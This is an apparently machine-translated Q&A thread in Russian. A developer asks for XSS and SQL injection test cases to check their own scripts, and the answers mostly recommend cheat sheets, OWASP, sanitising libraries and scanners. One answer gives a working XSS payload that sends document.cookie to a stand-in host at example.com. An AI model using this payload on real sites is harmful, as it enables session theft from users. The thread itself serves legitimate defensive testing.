Кто-то может дать мне некоторый основной XSS и сценарии внедрения SQL? (не, чем это кажется),
Я проверяю свои сценарии, чтобы видеть, предотвратят ли они xss и внедрения SQL. Может кто-то предоставлять мне некоторые основные, но хорошие сценарии, которые "взломали" бы мои программы. Я хочу протестировать свои сценарии, прежде чем это пойдет онлайн.
Править: Спасибо всем за те ссылки, они содержат загрузки и загрузки информации. Но для новичка к безопасности, там рекомендуемый сайт, который это? Я не уверен, готов ли я погрузиться прямо в проблемы безопасности в отделе. Мне нравятся ссылки waiwai933 рекомендуемый.
7 ответов
Шпаргалка по XSS на http://ha.ckers.org/xss.html - хороший набор тестов XSS. Однако я бы не рекомендовал внедрять вашу собственную программу проверки XSS; это намного сложнее, чем обнаружение SQL-инъекций (как вы, вероятно, поймете, увидев некоторые примеры в шпаргалке). Единственный надежный метод - это проанализировать код, построить из него дерево DOM и преобразовать это дерево обратно в HTML, а это большая работа, и другие люди уже сделали это. Используйте что-то вроде HTML Purifier .
+1 за заботу и знания, достаточные, чтобы спрашивать. Поскольку вы задаете вопросы безопасности, я хотел бы порекомендовать веб-сайт OWASP , если вы еще не знакомы. Вы найдете всевозможную информацию сверх того, что вы просили., Не говоря уже о тоннах информации о предотвращении всевозможных атак. Сайт - бесценный инструмент для веб-разработчиков.
В каждой ситуации требуются разные скрипты, поэтому не существует "универсального решения", которое кто-то мог бы предложить. Список скриптов, которые необходимо протестировать, исчисляется тысячами, прежде чем вы сможете быть уверены, что ваш сайт безопасен.
Вы можете проверить плагины для Firefox или Chrome, которые позволяют тестировать SQL-инъекции. Я предлагаю этот, но вы можете поискать и другие: https://addons.mozilla.org/en-US/firefox/addon/6727. Он позволяет вам предоставить список скриптов для инъекций, которых по умолчанию, вероятно, несколько, а затем, когда вы активируете его, он бомбардирует ваш сайт этими скриптами и позволяет вам увидеть, где есть уязвимости.
Я предлагаю этот сайт для примера XSS-скриптов: http://ha.ckers.org/xss.html
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
Я использовал этот инструмент для некоторых отличных результатов.
Самый простой, который не блокируется браузерами и может легко произойти, если вы не strip_tags() следующий код:
<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>
Вы можете попробовать с Acunetix Security Scanner, он не будет сканировать только на наличие XSS и MySQL инъекций по умолчанию, но даже для других видов эксплойтов. Программа практически эмулирует браузер и может вести себя как авторизованный пользователь.
Новый учебный сайт Googe jarslberg - отличный ресурс, который научит вас писать и защищаться от XSS и некоторых других атак на безопасность.